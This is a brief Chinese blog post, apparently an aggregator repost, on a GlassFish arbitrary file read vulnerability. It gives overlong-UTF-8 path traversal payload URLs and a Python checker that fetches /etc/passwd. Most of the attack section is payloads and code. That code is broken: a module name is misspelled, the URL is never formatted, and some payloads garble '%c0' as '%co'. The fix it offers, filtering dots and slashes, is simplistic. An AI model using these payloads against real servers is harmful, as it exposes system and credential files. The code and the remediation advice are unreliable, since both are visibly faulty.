glassfish任意文件读取漏洞解析

Posted 2020-10-20 挖洞的土拨鼠

tags:

篇首语：本文由小常识网(cha138.com)小编为大家整理，主要介绍了glassfish任意文件读取漏洞解析相关的知识，希望对你有一定的参考价值。

一、背景：

glassfish是一款java编写的跨平台的开源的应用服务器。

二、漏洞原理：

与宽字节SQL注入一致，都是由于unicode编码歧义导致的。具体payload如下构造：

http://ip:port/theme/META-INF/%c0%ae%co%ae/%c0%ae%co%ae/xxxpath/xxxfile

上述利用可以变形：

http://ip:port/theme/META-INF/%c0.%co./%c0.%co./%c0.%co./%c0.%co./%c0.%co./xxxpath/xxxfile

三、修复方案：

过滤掉. /等关键输入即可。

四、检查部分关键代码：

1 #glassfish any files readable vuln:
2 import requests
3 def check(ip,port):
4     url = "http://%s:%s/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
5     response = requsets.get(url)
6     if response.status_code == 200:
7         print "Vuln"

以上是关于glassfish任意文件读取漏洞解析的主要内容，如果未能解决你的问题，请参考以下文章

iis7.0解析漏洞 php用啥软件检测

任意文件读取漏洞的利用指南

File Inclusion 代码解析 1

代码审计两个任意文件读取漏洞实例

Tomcat幽灵猫任意文件读取漏洞复现

FFmpeg本地任意文件读取漏洞 / FFmpeg Local arbitrary file read vulnerability